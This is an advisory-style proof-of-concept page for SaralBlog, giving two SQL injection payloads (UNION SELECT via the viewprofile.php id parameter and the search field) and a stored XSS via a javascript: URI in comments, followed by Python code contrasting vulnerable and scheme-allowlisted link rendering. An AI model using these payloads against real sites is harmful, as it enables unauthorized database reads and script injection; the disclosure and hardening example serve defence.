PoC/Exploit for XSS and Multiple SQL Injection in SaralBlog

Published Proof of Concept code - XSS and Multiple SQL Injection in SaralBlog.

Description
Available
Solution
Not available - check vendor's website

1. SQL Injection Example

The id parameter of viewprofile.php is placed into the query without validation. A non-existent id is followed by a UNION SELECT with seven placeholder columns (a UNION only succeeds when its column count matches the original query's), and the trailing /* comments out the rest of the statement:

http://host/viewprofile.php?id=999%20union%20select%201,2,3,4,5,6,7/*


2. SQL Injection Example (magic_quotes_gpc: off)

The search term is placed inside a quoted, parenthesised expression. The payload closes both with ') and appends a UNION SELECT with six placeholder columns, again using /* to comment out the remainder. It needs a literal single quote, so it only works when magic_quotes_gpc is off (or the quote is otherwise left unescaped):

Search:
aaaaa') union select 1,2,3,4,5,6/*


3. Cross-Site Scripting

The Website field of a new comment is used as a link target without checking the URL scheme, so a javascript: URI is stored with the comment and executes when a visitor clicks the link:

Adding new comment:
Website: javascript:alert(123)
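Added example for the comment-link issue above; it is a generic reconstruction written for this page, not SaralBlog's code, and the function names and the anchor markup are assumptions. It shows the practitioner's caveat for this class of bug: HTML-escaping the Website value does nothing against javascript:alert(123), because that string contains no HTML-special characters, so the href needs a scheme allowlist in addition to escaping.

```python
import html
from typing import Optional
from urllib.parse import urlsplit


def render_comment_link_vulnerable(website: str) -> str:
    """Typical blog rendering: the value is HTML-escaped and dropped into
    href. Escaping only rewrites & < > " ' so a javascript: URI passes
    through untouched and runs when the link is clicked."""
    return f'<a href="{html.escape(website, quote=True)}">website</a>'


ALLOWED_SCHEMES = {"http", "https"}


def safe_href(website: str) -> Optional[str]:
    """Return the URL if its scheme is allowlisted, else None.
    Tabs and newlines are removed first because browsers drop them before
    parsing a URL, so 'java\\tscript:' would otherwise slip past the check."""
    candidate = "".join(ch for ch in website if ch not in "\t\r\n").strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return candidate


def render_comment_link_safe(website: str) -> str:
    """Hardened rendering: only http(s) URLs become links; anything else
    (javascript:, data:, vbscript:, scheme-less text) is shown as escaped
    plain text. A site could instead prefix scheme-less values with http://."""
    href = safe_href(website)
    if href is None:
        return html.escape(website, quote=True)
    return f'<a href="{html.escape(href, quote=True)}">website</a>'


if __name__ == "__main__":
    payload = "javascript:alert(123)"   # the PoC value from the advisory
    print(render_comment_link_vulnerable(payload))
    print(render_comment_link_safe(payload))
    print(render_comment_link_safe("https://example.org/~me"))
```

With the payload, the vulnerable renderer emits an anchor whose href is exactly javascript:alert(123); the safe renderer emits the same text escaped and outside any link. The allowlist is checked on the parsed scheme, not by string prefix, so case variants and embedded tab tricks are also rejected.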

Order Source Code Analysis

You may order a source code analysis of your site by Aliaksandr Hartsuyeu. The work will be done by experts in web security.